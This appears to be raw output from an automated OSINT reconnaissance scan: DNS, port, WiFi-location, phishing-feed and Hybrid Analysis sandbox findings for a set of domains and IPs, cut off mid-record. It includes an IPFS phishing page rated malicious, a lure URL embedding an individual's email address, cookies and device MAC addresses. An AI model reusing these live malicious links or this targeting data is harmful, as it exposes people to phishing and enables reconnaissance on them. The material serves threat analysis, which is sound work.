Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nwapi2.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nwapi2.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://nwapi2.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'cf-cache-status,report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.67.168.252']}}}, {}] |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.173): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.239): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MotoJava (Net ID: 00:01:24:F2:AB:40) | 37.7642, -122.3993 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip (Net ID: 00:02:2D:03:7C:7A) | 37.780462,-122.390564 |
| 2023-05-12 02:46:18 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 2 | 0 | None | Technology companies based in the San Francisco Bay Area | skip.ns.cloudflare.com |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:8080 | 104.21.6.166 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom94A3DC (Net ID: 00:0C:F6:94:A3:DC) | 50.8897, 6.0563 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00root.github.io]
https://www.openphish.com/feed.txt | 00root.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetA41A (Net ID: 00:01:36:57:A4:18) | 37.780462,-122.390564 |
| 2023-05-12 02:50:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 30, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://kikenbutsu-hei.shikaku-getter.info/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:3560:120:WilError_01"\n "Local\\SM0:3560:120:WilError_01"\n "SM0:3560:304:WilStaging_02"\n "Local\\SM0:3560:304:WilStaging_02"\n "InternetShortcutMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"202.226.37.169:80"\n "138.91.254.96:443"\n "142.251.32.42:80"\n "104.17.25.14:443"\n "13.227.74.81:80"\n "185.199.108.153:443"\n "20.99.185.48:443"\n "142.250.189.226:80"\n "142.250.189.226:443"\n "142.250.189.194:443"\n "142.251.214.130:443"\n "142.250.189.234:443"\n "142.250.191.33:443"\n "142.250.189.162:443"\n "172.217.12.99:443"\n "142.250.189.227:443"\n "142.251.32.36:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kikenbutsu-hei.shikaku-getter.info"\n "ajax.googleapis.com"\n "dn.msmstatic.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /images/favicon.ico HTTP/1.1\nHost: kikenbutsu-hei.shikaku-getter.info\nConnection: keep-alive\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56\nAccept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8\nReferer: http://kikenbutsu-hei.shikaku-getter.info/\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: _ga_YTHJT2QPH0=GS1.1.1683852253.1.0.1683852253.0.0.0; _ga=GA1.2.504460167.1683852253; _gid=GA1.2.251658778.1683852255; _gat_gtag_UA_105729601_1=1; __gads=ID=37b1f143d2eff9ac-22522163abde00b6:T=1683852256:RT=1683852256:S=ALNI_Ma8Y6OT5-ZRyf8rZfw3X1o10bxaMw; __gpi=UID=00000989794fbd85:T=1683852256:RT=1683852256:S=ALNI_MY1Pcut_bZsdRPcxBF9Ibwxm1KXuw"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"adservice.google.com"\n "ajax.googleapis.com"\n "ajaxzip3.github.io"\n "api.edgeoffer.microsoft.com"\n "arc.msn.com"\n "cdnjs.cloudflare.com"\n "dn.msmstatic.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "googleads.g.doubleclick.net"\n 
"kikenbutsu-hei.shikaku-getter.info"\n "pagead2.googlesyndication.com"\n "partner.googleadservices.com"\n "tpc.googlesyndication.com"\n "www.be-index.com"\n "www.googletagservices.com"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: 
"ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""beautiiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""beautyandwhiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""bellagracehealthscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""belleandbubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""beyondblessedscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\shopping.js]- [targetUID: 00000000-00007752]\n "data_2" has type 
"data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00007872]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: N/A]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\7752_445480169\\edge_driver.js]- [targetUID: 00000000-00007752]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\edge_driver.js]- [targetUID: 00000000-00007752]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00007872]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\7752_445480169\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00007752]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\auto_open_controller.js]- [targetUID: 00000000-00007752]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007752]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\7752_445480169\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00007752]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007752]\n 
"edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007752]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7752_936046049\\product_page.js]- [targetUID: 00000000-00007752]\n "c0b99d91-76c9-4b69-aa3 | 185.199.108.153 |
| 2023-05-12 02:56:16 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://www.ayhu.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://www.ayhu.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | www.ayhu.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | www.hollywoodbowl.org (Net ID: 00:01:F4:ED:A0:89) | 34.0544, -118.244 |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 4 | 0 | None | http://vscode.battleb0t.xyz | <!DOCTYPE html>
|
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet8682 (Net ID: 00:01:36:5B:86:80) | 37.7813933,-122.3918002 |
| 2023-05-12 03:09:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.133:80 | 185.199.108.0/24 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | tumblr (Category: images)
https://Altpapier.tumblr.com | Altpapier |
| 2023-05-12 02:46:49 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 35.229.48.116 |
| 2023-05-12 02:59:13 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 4, u'threat_score': None, u'compromised_hosts': [u'104.17.244.204', u'34.74.170.74'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://info.pcmiler.com/trial36download', u'signatures': [{u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-2', u'name': u'An application crash occurred', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Report process "WerFault.exe" was created by "rundll32.exe"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"{"url":"https://info.pcmiler.com/trial36download","portal":4239221,"content":77280338489,"group":-1,"connection":{},"timing":{"navigationStart":1658937102290,"unloadEventStart":0,"unloadEventEnd":0,"redirectStart":0,"redirectEnd":0,"fetchStart":1658937102290,"domainLookupStart":1658937102298,"domainLookupEnd":1658937102298,"connectStart":1658937102298,"connectEnd":1658937102298,"requestStart":1658937102298,"responseStart":1658937102298,"responseEnd":1658937102509,"domLoading":1658937102298,"domInteractive":1658937108930,"domContentLoadedEventStart":1658937109483,"domContentLoadedEventEnd":1658937109539,"domComplete":1658937110504,"loadEventStart":1658937110555,"loadEventEnd":1658937110556,"msFirstPaint":1658937108124}}" (Indicator: "connect") in Source: SSL_199.60.103.254\n "MaxConnectionsPerServer" (Indicator: "MaxConnectionsPerServer") in Source: 
00000000-00000836-00000BCA-9552128\n "MaxConnectionsPer1_0Server" (Indicator: "MaxConnectionsPer1_0Server") in Source: 00000000-00000836-00000BCA-9553085'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1B6C.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1B3B.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"199.60.103.254:443"\n "104.17.244.204:443"\n "104.19.154.83:443"\n "34.74.170.74:443"\n "142.251.46.202:443"\n "142.251.46.227:80"\n "142.251.46.227:443"\n "172.64.154.85:443"\n "104.17.127.171:443"\n "104.17.113.176:443"\n "104.17.67.176:443"\n "104.17.231.204:443"\n "104.19.155.83:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.pki.goog"\n "forms.hubspot.com"\n "info.pcmiler.com"\n "no-cache.hubspot.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_344_IESQMMUTEX_0_519"\n 
"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "DBWinMutex"\n "IsoScope_344_IESQMMUTEX_0_303"\n "IsoScope_344_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_344_IESQMMUTEX_0_331"\n "IsoScope_344_IE_EarlyTabStart_0x404_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_836"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_344_ConnHashTable<836>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "WerFault.exe" (UID: 00000000-00001008) was launched with missing environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3728 -s 132" (UID: 00000000-00001008)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "WerFault.exe" with commandline "-u -p 3728 -s 132" (UID: 
00000000-00001008)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab1B6B.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00000944]\n "~DF58A3C7FC46791459.TMP" has type "data"- Location: [%TEMP%\\~DF58A3C7FC46791459.TMP]- [targetUID: 00000000-00000836]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000944]\n "9FF67FB3141440EED32363089565AE60_A615E3E02EF226C595CCB8A65F518E46" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\9FF67FB3141440EED32363089565AE60_A615E3E02EF226C595CCB8A65F518E46]- [targetUID: 00000000-00000944]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00000944]\n "Tar1B6C.tmp" has type "data"- Location: [%TEMP%\\Tar1B6C.tmp]- [targetUID: 00000000-00000944]\n 
"E87CE99F124623F95572A696C80EFCAF_4D168D4419431996C7034D53B3EACCBC" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\E87CE99F124623F95572A696C80EFCAF_4D168D4419431996C7034D53B3EACCBC]- [targetUID: 00000000-00000944]\n "OHJEU00P.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OHJEU00P.txt]- [targetUID: 00000000-00000836]\n "~DFA369BD3616ADAA96.TMP" has type "data"- Location: [%TEMP%\\~DFA369BD3616ADAA96.TMP]- [targetUID: 00000000-00000836]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00000836]\n "0GEZRX8E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0GEZRX8E.txt]- [targetUID: 00000000-00000944]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00000944]\n "2CFF2069B7EA2CB5727F7B96AB6C7353" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\2CFF2069B7EA2CB5727F7B96AB6C7353]- [targetUID: 00000000-00000944]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00000944]\n "Tar1B3B.tmp" has type "data"- Location: [%TEMP%\\Tar1B3B.tmp]- [targetUID: 00000000-00000944]\n "A16C6C16D94F76E0808C087DFC657D99_F97E3458719FE8B5437DE55F349865B9" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\A16C6C16D94F76E0808C087DFC657D99_F97E3458719FE8B5437DE55F349865B9]- [targetUID: 00000000-00000944]'}, {u'category': u'Network Related', u'origin': u'File/Memory', 
u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /trial36download HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla | 34.74.170.74 |
| 2023-05-12 02:50:37 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://bafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.link/kshare.html', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://bafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.link/kshare.html#p.wehnert%40heathus.com', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'https://bafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.link/', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 26, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://bafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.link/kshare.html#p.wehnert%40heathus.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:2524:304:WilStaging_02"\n "Local\\SM0:2524:304:WilStaging_02"\n "Local\\SM0:2524:120:WilError_01"\n "InternetShortcutMutex"\n "SM0:2524:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"209.94.90.1:443"\n 
"138.91.254.96:443"\n "104.18.23.52:443"\n "185.199.108.153:443"\n "69.16.175.42:443"\n "20.99.185.48:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "arc.msn.com"\n "bafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.link"\n "bafybeifs6aeegaj3ly4eg5ueiilwt5tr357zjlb63ngvmcwb5k44fd4jyu.ipfs.w3s.link"\n "code.jquery.com"\n "lipis.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," 